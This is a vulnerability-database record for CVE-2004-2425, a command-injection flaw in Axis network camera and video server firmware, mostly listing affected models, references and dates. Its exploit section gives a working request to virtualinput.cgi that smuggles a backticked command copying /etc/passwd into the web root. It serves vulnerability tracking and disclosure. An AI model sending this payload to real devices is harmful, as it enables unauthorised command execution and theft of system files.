ID
VAR-E-200408-0043
CVE
| cve_id: | CVE-2004-2425 | Trust: 1.6 |
EDB ID
24400
TITLE
Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution - CGI webapps Exploit
Trust: 0.6
DESCRIPTION
Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution. CVE-2004-2425CVE-9121 . webapps exploit for CGI platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | axis | model: | network camera and video server | scope: | eq | version: | 2.x1-3 | Trust: 1.6 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24113.12 | Trust: 0.6 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 2401+3.12 | Trust: 0.6 |
| vendor: | axis | model: | communications storpoint cd | scope: | - | version: | - | Trust: 0.3 |
| vendor: | axis | model: | communications serial server | scope: | eq | version: | 2490 | Trust: 0.3 |
| vendor: | axis | model: | communications network dvr | scope: | eq | version: | 2460 | Trust: 0.3 |
| vendor: | axis | model: | communications mpeg-2 video server 250s | scope: | - | version: | - | Trust: 0.3 |
| vendor: | axis | model: | communications 250s video server | scope: | eq | version: | 3.03 | Trust: 0.3 |
| vendor: | axis | model: | communications 250s mpeg-2 video server | scope: | eq | version: | 3.10 | Trust: 0.3 |
| vendor: | axis | model: | communications serial server | scope: | eq | version: | 24902.11.3 | Trust: 0.3 |
| vendor: | axis | model: | communications network dvr | scope: | eq | version: | 24603.11 | Trust: 0.3 |
| vendor: | axis | model: | communications network dvr | scope: | eq | version: | 24603.10 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24202.34 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24202.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.41 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.40 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.34 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.33 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.31 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24113.13 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 2401+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications blade video server | scope: | eq | version: | 2401+3.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.34 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.33 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.32 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.31 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.30 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.20 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24011.15 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24011.01 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 2400+3.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 2400+3.11 | Trust: 0.3 |
| vendor: | axis | model: | communications blade video server | scope: | eq | version: | 2400+3.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.34 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.33 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.32 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.31 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.30 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.20 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.0 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.15 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.12 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.11 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.10 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.02 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.01 | Trust: 0.3 |
| vendor: | axis | model: | communications mpeg-2 video server | scope: | eq | version: | 2303.11 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.40 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.34 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.32 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.31 | Trust: 0.3 |
| vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.41 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.40 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.34 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.31 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.12 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.41 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.40 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.34 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.31 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.12 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.41 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.40 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.34 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.33 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.32 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.31 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.30 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.12 | Trust: 0.3 |
| vendor: | axis | model: | communications 250s mpeg-2 video server | scope: | ne | version: | 3.20 | Trust: 0.3 |
| vendor: | axis | model: | communications digital video recorder | scope: | ne | version: | 24603.13 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 24202.42 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 24113.13 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 2401+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications blade video server | scope: | ne | version: | 2401+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 24012.34.1 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 2400+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications blade video server | scope: | ne | version: | 2400+3.13 | Trust: 0.3 |
| vendor: | axis | model: | communications video server | scope: | ne | version: | 24002.34.1 | Trust: 0.3 |
| vendor: | axis | model: | communications mpeg-2 video server | scope: | ne | version: | 2303.20 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 21302.42 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 21202.42 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 21102.42 | Trust: 0.3 |
| vendor: | axis | model: | communications network camera | scope: | ne | version: | 21002.42 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/11011/info
1. A shell metacharacter command-execution vulnerability allows an anonymous user to download the contents of the '/etc/passwd' file on the device. Other commands are also likely to work, facilitating other attacks.
This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.34 thru 2.40
- Axis 2130 network cameras
- Axis 2401 and 2401 video servers
http://www.example.com/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'virtualinput.cgi' Arbitrary Command Execution
Trust: 1.0
CREDITS
bashis
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 24400 | Trust: 1.9 |
| db: | BID | id: | 11011 | Trust: 1.9 |
| db: | NVD | id: | CVE-2004-2425 | Trust: 1.6 |
| db: | EDBNET | id: | 46534 | Trust: 0.6 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2004-2425 | Trust: 1.6 |
| url: | https://www.securityfocus.com/bid/11011/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/24400/ | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/24402 | Trust: 0.3 |
| url: | http://www.axis.com/products/camera_servers/index.htm | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/24401 | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/24400 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 11011 |
| db: | EXPLOIT-DB | id: | 24400 |
| db: | EDBNET | id: | 46534 |
LAST UPDATE DATE
2022-07-27T09:44:13.492000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 11011 | date: | 2007-02-06T20:08:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 11011 | date: | 2004-08-23T00:00:00 |
| db: | EXPLOIT-DB | id: | 24400 | date: | 2004-08-23T00:00:00 |
| db: | EDBNET | id: | 46534 | date: | 2004-08-23T00:00:00 |